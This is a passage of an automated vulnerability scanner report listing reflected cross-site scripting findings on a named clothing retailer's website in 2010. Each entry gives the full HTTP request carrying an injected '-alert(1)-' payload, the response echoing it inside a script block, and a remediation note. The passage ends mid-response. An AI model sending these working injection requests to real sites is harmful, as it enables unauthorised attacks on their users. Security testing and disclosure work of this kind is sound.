The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dec"-alert(1)-"ff296b429aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/?87dec"-alert(1)-"ff296b429aa=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hct66ard6uj5ogudkb7unb1on2; expires=Tue, 09-Nov-2010 17:04:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Accesso
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/?87dec"-alert(1)-"ff296b429aa=1");
//]]>
...[SNIP]...

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaeba"-alert(1)-"564e77c9441 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessorieseaeba"-alert(1)-"564e77c9441/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=773q5gsdpnv68cnfegbhjdu6s6; expires=Tue, 09-Nov-2010 17:04:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessorieseaeba"-alert(1)-"564e77c9441/men/");
//]]>
...[SNIP]...

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0c1"-alert(1)-"54c23c18eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/menca0c1"-alert(1)-"54c23c18eea/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7rt87m86laigg4gl21ne3jr05; expires=Tue, 09-Nov-2010 17:05:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/menca0c1"-alert(1)-"54c23c18eea/");
//]]>
...[SNIP]...

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590b7"-alert(1)-"544c5a1307c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/men/?590b7"-alert(1)-"544c5a1307c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8a661dttofbjdqts80oc7tuh30; expires=Tue, 09-Nov-2010 17:03:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's A
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/men/?590b7"-alert(1)-"544c5a1307c=1");
//]]>
...[SNIP]...

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fe7"-alert(1)-"0b8ff4d883b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories11fe7"-alert(1)-"0b8ff4d883b/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41433rkoa4tsrfs0gjisr0kgh3; expires=Tue, 09-Nov-2010 17:04:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories11fe7"-alert(1)-"0b8ff4d883b/women/");
//]]>
...[SNIP]...

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebf0"-alert(1)-"bda42614438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women5ebf0"-alert(1)-"bda42614438/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rl1ftnqr0ih5pd8j1k1v00h7j4; expires=Tue, 09-Nov-2010 17:04:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women5ebf0"-alert(1)-"bda42614438/");
//]]>
...[SNIP]...

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39ae"-alert(1)-"affbc874198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women/?c39ae"-alert(1)-"affbc874198=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msht6dmdh4f7qkdrokbg4p7sa4; expires=Tue, 09-Nov-2010 17:03:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women/?c39ae"-alert(1)-"affbc874198=1");
//]]>
...[SNIP]...

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b4aa"-alert(1)-"eed14cdfb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade9b4aa"-alert(1)-"eed14cdfb13/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=enh4qopt52d480f45ghi1eifu3; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade9b4aa"-alert(1)-"eed14cdfb13/");
//]]>
...[SNIP]...

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a634a"-alert(1)-"292ae239ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade/?a634a"-alert(1)-"292ae239ba4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l6hegaha8strl6ujrbvmu5cg23; expires=Tue, 09-Nov-2010 17:18:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Arcade
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade/?a634a"-alert(1)-"292ae239ba4=1");
//]]>
...[SNIP]...

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e542"-alert(1)-"ab556611c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags1e542"-alert(1)-"ab556611c86/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6et872hljcv57tm45lk8ssvqp2; expires=Tue, 09-Nov-2010 17:21:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags1e542"-alert(1)-"ab556611c86/");
//]]>
...[SNIP]...

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 672ee"-alert(1)-"71633396054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/?672ee"-alert(1)-"71633396054=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vprn28dhlohctf81ipm71lhos2; expires=Tue, 09-Nov-2010 17:21:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Bags -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/?672ee"-alert(1)-"71633396054=1");
//]]>
...[SNIP]...

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11130"-alert(1)-"1f093ec014e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags11130"-alert(1)-"1f093ec014e/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eu32c8hn6p6l6pl7shl718a3s1; expires=Tue, 09-Nov-2010 17:21:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags11130"-alert(1)-"1f093ec014e/men/");
//]]>
...[SNIP]...

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 700bd"-alert(1)-"638b67561b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men700bd"-alert(1)-"638b67561b1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2dpnq9s6uhordu2ekaag73oqd1; expires=Tue, 09-Nov-2010 17:22:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men700bd"-alert(1)-"638b67561b1/");
//]]>
...[SNIP]...

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc8a"-alert(1)-"a9caf531ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=987e9hdtksal28qktsq7m48l10; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30278

